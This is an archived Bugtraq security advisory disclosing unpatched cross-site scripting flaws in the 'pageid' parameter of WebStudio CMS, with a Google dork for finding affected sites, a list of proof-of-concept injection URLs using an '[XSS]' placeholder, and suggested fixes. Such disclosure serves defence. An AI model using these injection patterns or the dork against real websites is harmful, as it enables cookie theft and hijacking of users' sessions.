|
Bugtraq
mailing list archives
WebStudio Multiple XSS Vulnerabilities
From: glafkos () gmail com
Date: 4 Jun 2007 11:36:06 -0000
Application: WebStudio CMS
Vendors Url: http://www.bdigital.biz
Bug Type: Multiple URL Handling Remote Cross-Site Scripting Vulnerabilities
Exploitation: Remote
Severity: Less Critical
Solution Status: Unpatched
Introduction: WebStudio CMS is a web-based CMS system
Google Dork: "Powered by WebStudio"
Description:
User-supplied input passed via the URL is not properly sanitised before it is being returned to the user in
index.php?pageid=. This can be exploited to execute arbitrary script code in the security context of an affected
website, as a result the code will be able to access any of the target user's cookies, access data recently submitted
by the target user via web form to the site, or take actions on the site acting as the target user.
PoC:
http://[target]/?pageid=[XSS]
http://[target]/?pageid=</textarea>[XSS]
http://[target]/?pageid=</title>[XSS]
http://[target]/?pageid=-->[XSS]
http://[target]/?pageid=email () address com[XSS]domain com
http://[target]/?pageid=<body+onload=[XSS]
http://[target]/?pageid=</div>[XSS]
http://[target]/index.php?pageid=>'>[XSS]
http://[target]/index.php?pageid=</textarea>[XSS]
http://[target]/index.php?pageid=</title>[XSS]
http://[target]/index.php?pageid=-->[XSS]
http://[target]/index.php?pageid=email () address com[XSS]domain com
http://[target]/index.php?pageid=<body+onload=[XSS]
http://[target]/index.php?pageid=</div>[XSS]
Solution:
There was no vendor-supplied solution at the time of entry.
Edit source code manually to ensure user-supplied input is correctly sanitised.
Filter malicious characters and character sequences via a HTTP proxy or firewall with URL filtering capabilities.
Credits:
Glafkos Charalambous
glafkos (at) infosec (dot) org (dot) uk
Information Security Uncensored
InfoSEC.org.uk
 By Date 
By Thread
Current thread:
- WebStudio Multiple XSS Vulnerabilities glafkos (Jun 04)
| 
Intro
